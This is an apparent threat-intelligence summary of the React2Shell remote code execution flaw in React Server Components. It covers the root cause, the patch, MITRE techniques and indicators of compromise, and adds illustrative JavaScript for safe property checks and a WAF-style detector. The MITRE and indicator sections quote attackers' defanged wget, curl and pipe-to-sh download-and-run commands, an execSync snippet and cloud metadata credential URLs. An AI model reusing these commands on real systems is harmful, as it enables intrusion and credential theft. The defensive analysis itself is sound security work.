CVE-2025-55182 (React2Shell) is a critical (CVSS 10.0) pre-authentication remote code execution in React Server Components that allows attackers to craft Flight payload chunks to reach the Function constructor and execute arbitrary Node.js commands. Trend observed widespread in-the-wild exploitation and multiple campaigns (e.g., emerald, nuts) delivering Cobalt Strike, Mirai variants, Nezha, Sliver, and Secret-Hunter payloads. #CVE-2025-55182 #React2Shell
Keypoints
- The root cause is a deserialization bug in ReactFlightReplyServer.js where value.hasOwnProperty(i) performs a method lookup on untrusted objects, allowing attackers to shadow hasOwnProperty and traverse prototype properties like constructor.
- The exploit chain uses four stages: a self-reference loop ($@), forcing .then execution, marking chunks as resolved_model to trigger initialization, and abusing $B Blob handling to call Function(…) and execute arbitrary commands.
- Trend identified ~145 in-the-wild PoCs of varying quality, plus opportunistic mass scanning and automated exploitation targeting cloud-hosted Next.js/React apps.
- Multiple active campaigns (emerald, nuts) and payload families were observed delivering Mirai variants, Cobalt Strike beacons (CrossC2), Nezha agents, FRP, Sliver implants, cryptominers, and a Secret-Hunter Node.js exfiltration tool.
- The official patch caches Object.prototype.hasOwnProperty and switches to hasOwnProperty.call(value, key), adds explicit __proto__ handling, and introduces other defenses (Proxy server module map, AES-256-GCM action encryption, prototype validation).
- Defenders should upgrade React/Next.js to the patched versions, deploy IDS/WAF patterns for Flight payload indicators (Next-Action header, $@, resolved_model, constructor:constructor, _formData.get), and treat many public PoCs as potentially malicious or backdoored.
- Trend Vision One provides detections, hunting queries, and telemetry-based IoCs and encourages auditing Server Actions, rate limiting, and considering Edge Runtime to reduce exposure.
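The following is an added JavaScript illustration of the bug class named in the root-cause and patch keypoints above. It is not React's code and makes no claim about how the Flight deserializer is laid out; `ownKeysUnsafe`, `ownKeysSafe`, `unsafeCheckThrows`, `demo` and the three sample inputs are constructed for this example. It shows why asking an untrusted object `value.hasOwnProperty(key)` is unsafe, and what the cached `hasOwnProperty.call(value, key)` plus explicit `__proto__` rejection buys.

```javascript
// Added illustration of the own-property check pattern (not React's code).
// A deserializer that decides which keys of an untrusted object to walk must
// not ask the object itself, because the object can carry its own
// "hasOwnProperty" member that lies, or that is not a function at all.

// Unsafe: method lookup on the untrusted value (the pattern the page
// describes as the root cause).
function ownKeysUnsafe(value, candidateKeys) {
  return candidateKeys.filter((key) => value.hasOwnProperty(key));
}

// Hardened: cache the real check before any input is processed and invoke it
// with the untrusted value as `this`. "__proto__" is rejected explicitly
// because JSON.parse creates an own property with that name, so the cached
// check alone would report it as ordinary data.
const hasOwn = Object.prototype.hasOwnProperty;
function ownKeysSafe(value, candidateKeys) {
  return candidateKeys.filter((key) => {
    if (key === '__proto__') return false;
    return hasOwn.call(value, key);
  });
}

// Helper for the failure mode: does the unsafe check throw on this input?
function unsafeCheckThrows(value, candidateKeys) {
  try {
    ownKeysUnsafe(value, candidateKeys);
    return false;
  } catch (err) {
    return err instanceof TypeError;
  }
}

// Constructed inputs (not captured traffic).
// 1) An object whose own hasOwnProperty always answers "yes": the unsafe walk
//    now treats the inherited "constructor" (Object.prototype.constructor,
//    i.e. a path to Function) as if it were the object's own data.
const lyingObject = { hasOwnProperty: () => true, data: 1 };
// 2) Plain JSON that shadows the method with a string: the unsafe check
//    throws a TypeError instead of answering.
const jsonShadow = JSON.parse('{"hasOwnProperty":"x","data":1}');
// 3) Plain JSON with an own "__proto__" key: the cached check says "own", so
//    only the explicit rejection keeps it out of the walk.
const jsonProto = JSON.parse('{"__proto__":{"polluted":true},"data":1}');

function demo() {
  return {
    unsafeOnLyingObject: ownKeysUnsafe(lyingObject, ['constructor', 'data']), // ['constructor', 'data']
    safeOnLyingObject: ownKeysSafe(lyingObject, ['constructor', 'data']),     // ['data']
    unsafeThrowsOnJson: unsafeCheckThrows(jsonShadow, ['data']),               // true
    safeOnJsonProto: ownKeysSafe(jsonProto, ['__proto__', 'data']),            // ['data']
    rawCheckSaysProtoIsOwn: hasOwn.call(jsonProto, '__proto__'),               // true
  };
}

console.log(demo());
```

The last two results are the point of the explicit `__proto__` branch: the cached check is correct about ownership, but "own" is not the same as "safe to walk", so a deserializer needs both the cached call and a deny-list for keys that steer into the prototype chain.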
MITRE Techniques
- [T1190] Exploit Public-Facing Application - pre-auth remote code execution against React Server Components that executes code before authentication (“pre-authentication remote code execution vulnerability affecting React Server Components”).
- [T1059] Command and Scripting Interpreter - attackers execute shell commands via Node.js child_process and PowerShell one-liners on Windows (“process.mainModule.require('child_process').execSync(…)”, PowerShell base64 command).
- [T1105] Ingress Tool Transfer - adversaries download tooling and payloads (bots, Mirai binaries, Sliver, miners) using wget/curl (“wget hxxp://gfxnick[.]emerald[.]usbx[.]me/bot; chmod 777 bot; ./bot”, “curl -vk hxxps://216[.]238[.]68[.]169/ReactOS -o /root/.rtos”).
- [T1071] Application Layer Protocol - command-and-control over HTTP(S) and Cloudflare Tunnels for C2 and exfiltration (“hxxps[://]conclusion-ideas-cover-customise[.]trycloudflare[.]com”, “JSON-serialized, and POSTed to this endpoint”).
- [T1543] Create or Modify System Process - persistence via systemd service installation observed for Cobalt Strike and other implants (“sets a systemd service for persistence”, “drops the beacon to /usr/local/rsyslo”).
- [T1053] Scheduled Task/Job - use of cron @reboot and other scheduled job mechanisms to maintain persistence (“installs its own cron jobs to re-download the payload every minute”).
- [T1539] Steal Cloud Instance Metadata - harvesting cloud IMDS to obtain temporary credentials for AWS/GCP/Azure (“http://169[.]254[.]169[.]254/latest/meta-data/iam/security-credentials/”, “http://metadata.google.internal/computeMetadata/v1/”).
- [T1082] System Information Discovery - host discovery commands and defensive-reconnaissance behaviors such as whoami, systeminfo, and Defender queries (“whoami”, “collected Microsoft Defender settings”).
- [T1090] Proxy - use of FRP and SOCKS5 proxies for network pivoting and remote access (“FRP (Fast Reverse Proxy)”, “functions as a SOCKS5 proxy for network pivoting”).
- [T1041] Exfiltration Over C2 Channel - exfiltration of discovered secrets and files via C2 channels (Cloudflare Tunnel POSTs and other C2 endpoints) (“Data is deep-cleaned, JSON-serialized, and POSTed to this endpoint”).
Indicators of Compromise
- [IP Address] observed C2 and download hosts: 193[.]34[.]213[.]150, 154[.]89[.]152[.]240, and 8 other IPs referenced for payload delivery and C2.
- [Domain] malicious hosting and C2 domains: gfxnick[.]emerald[.]usbx[.]me (usbx.me), conclusion-ideas-cover-customise[.]trycloudflare[.]com, and 5 other domains used for payload delivery, C2, or drop sites.
- [File name / path] payloads and persistence artifacts: bot, healthcheck.dll, /root/.rtos, /dev/shm/rtos, and several other dropped binaries and staging paths.
- [Payload pattern] Flight protocol and exploit markers in HTTP bodies/headers: Next-Action: * header, $@0 / $@1 chunk references, resolved_model, constructor:constructor, _formData.get (used to invoke Function()).
- [URLs / scripts] download/execution commands, for example hxxp://193[.]34[.]213[.]150/nuts/x86 (Mirai download), hxxp://38[.]165[.]44[.]205/s | sh (FRP installer), and additional malicious script URLs.
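As an added example of the IDS/WAF-style check the defender keypoint and the payload-pattern indicator describe, the JavaScript below scores an HTTP request against the Flight markers listed on this page. It is not Trend Micro's detection content; `inspectRequest`, `getHeader`, the weights and thresholds, and the sample requests are constructed for this example, and the sample bodies are marker bags rather than real Flight payloads. The example assumes the request body is already decoded to text.

```javascript
// Added detection example (not Trend Micro's rules). Flags requests that
// carry the React2Shell indicators named on the page: a Next-Action header
// combined with Flight chunk markers in the body.

// Markers taken from the page's indicator list; the regexes are assumptions
// about how each appears in a decoded request body.
const FLIGHT_MARKERS = [
  { name: 'self-reference chunk ($@N)', re: /\$@\d+/ },
  { name: 'resolved_model status', re: /resolved_model/ },
  { name: 'constructor:constructor traversal', re: /constructor\s*:\s*constructor/ },
  { name: '_formData.get invocation', re: /_formData\.get/ },
];

// Case-insensitive header lookup, since clients and proxies vary the casing.
function getHeader(headers, name) {
  const wanted = name.toLowerCase();
  for (const [key, value] of Object.entries(headers)) {
    if (key.toLowerCase() === wanted) return value;
  }
  return undefined;
}

// Returns { nextAction, markers, verdict }. Thresholds are an assumption:
// a Server Action request (Next-Action present) with two or more markers is
// blocked, anything else carrying a marker is queued for review.
function inspectRequest(req) {
  const body = typeof req.body === 'string' ? req.body : '';
  const markers = FLIGHT_MARKERS.filter((m) => m.re.test(body)).map((m) => m.name);
  const nextAction = getHeader(req.headers || {}, 'next-action') !== undefined;
  let verdict = 'allow';
  if (nextAction && markers.length >= 2) verdict = 'block';
  else if (markers.length >= 1) verdict = 'review';
  return { nextAction, markers, verdict };
}

// Constructed sample requests (not captured traffic). The suspicious body is
// a bag of markers, not a working Flight payload.
const SAMPLE_REQUESTS = {
  benignAction: {
    headers: { 'Next-Action': 'a1b2c3', 'Content-Type': 'text/plain' },
    body: '["alice",{"page":2}]',
  },
  suspiciousAction: {
    headers: { 'next-action': 'deadbeef', 'Content-Type': 'multipart/form-data' },
    body: '{"a":"$@0","status":"resolved_model","b":"constructor:constructor","c":"_formData.get"}',
  },
  noHeaderMarker: {
    headers: { 'Content-Type': 'application/json' },
    body: '{"ref":"$@1"}',
  },
};

function runSamples() {
  const out = {};
  for (const [label, req] of Object.entries(SAMPLE_REQUESTS)) {
    out[label] = inspectRequest(req);
  }
  return out; // benignAction: allow, suspiciousAction: block, noHeaderMarker: review
}

console.log(runSamples());
```

The header-only gate is deliberate: `$@` and `resolved_model` are legitimate Flight vocabulary, so a body marker on its own is a review signal, while the combination of a Server Action request and several markers is what the page singles out as the exploit shape.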
Read more: https://www.trendmicro.com/en_us/research/25/l/CVE-2025-55182-analysis-poc-itw.html